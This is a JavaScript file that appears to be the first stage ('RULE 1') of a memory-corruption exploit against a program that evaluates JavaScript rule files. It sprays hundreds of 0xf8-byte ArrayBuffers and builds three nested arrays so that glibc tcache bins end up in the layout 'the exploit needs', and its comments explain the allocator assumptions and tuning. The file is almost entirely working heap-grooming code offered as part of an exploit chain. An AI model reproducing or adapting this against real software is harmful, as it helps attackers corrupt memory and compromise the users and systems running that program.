/**
 * RULE 1
 * This rule tries to allocate 3 contiguous heap chunks of size 0x100, as
 * 3 arrays of 0x1f BinaryValue pointers.
 * They fit in the tcache, and as such, when the rule exits,
 * BinaryValueFree() will free them and put them in the tcache of the main
 * thread. This gives us the heap layout the exploit needs in order to
 * succeed.
 */
// Requested size of each spray allocation: 0xf8 bytes, so that once the
// allocator's chunk header is added the backing chunk is 0x100 (per the
// header comment; this is allocator-specific — glibc sizing is assumed).
BLOCK_SIZE = 0x100 - 0x8; // 0xf8
// Number of 8-byte BinaryValue pointers that fit in one such block (31).
ARY_SIZE = BLOCK_SIZE / 8; // 0x1f
// Number of ArrayBuffers to spray before the three target arrays are created.
// NOTE(review): tuning constant — presumably chosen to soak up whatever free
// 0x100-class chunks already sit in the "messy" heap; re-tune empirically if
// the three target arrays stop landing next to each other.
NB_BLOCKS = 508;
// Holds the sprayed buffers so they stay reachable for the rest of the rule.
var blocks = new Array(NB_BLOCKS);
// Main array, contains everything we need. It is also the last expression of
// this file (see the bottom), i.e. the value handed back to the host.
// NOTE: BLOCK_SIZE, ARY_SIZE, NB_BLOCKS and main are implicit globals. They
// would raise ReferenceError under strict mode, so do not add 'use strict'
// (or convert them to const/let) without checking how the host evaluates
// rule files.
main = new Array(2).fill(0);
// Create a lot of BLOCK_SIZE ArrayBuffers (AB). They will go into the "messy"
// heap space and allow our next allocations to be contiguous (hopefully).
// The spray is lazy: it only runs when the `trigger` getter is read, which
// presumably happens while the host walks `main` — TODO confirm that main[0]
// is visited before main[1], otherwise the spray happens after the target
// arrays are laid out and does nothing useful.
main[0] = {
get trigger() {
for(var i=0; i < NB_BLOCKS; i++) {
blocks[i] = new ArrayBuffer(BLOCK_SIZE);
}
// The returned string is presumably only a marker visible to the host.
return 'create_SIZE_blocks';
}
};
// Hopefully, the next three are contiguous.
// We create them like this because it makes less allocs than one-by-one.
// Less chances to mess up.
// The first element of the innermost array will put every array length to 0
// when evaluated. This avoids the allocation of BinaryValue (BV) structs (and
// other JS structs).
// NOTE(review): the groom assumes the three frees done by BinaryValueFree()
// are the only frees of this size class before the exploit runs (tcache bins
// hold a bounded number of chunks, 7 by default on glibc); any other free or
// allocation of a 0x100 chunk in between reorders the bin.
// Do not reorder or merge these statements: the exact allocation sequence is
// what the layout depends on.
main[1] = new Array(ARY_SIZE);
main[1][0] = new Array(ARY_SIZE);
main[1][0][0] = new Array(ARY_SIZE);
main[1][0][0][0] = {
get trigger() {
// Truncate innermost-first so each array is empty by the time it is walked.
// The getter intentionally returns undefined.
main[1][0][0].length = 0;
main[1][0].length = 0;
main[1].length = 0;
}
};
// GO
// Final expression: the host receives `main` as the rule's result.
main;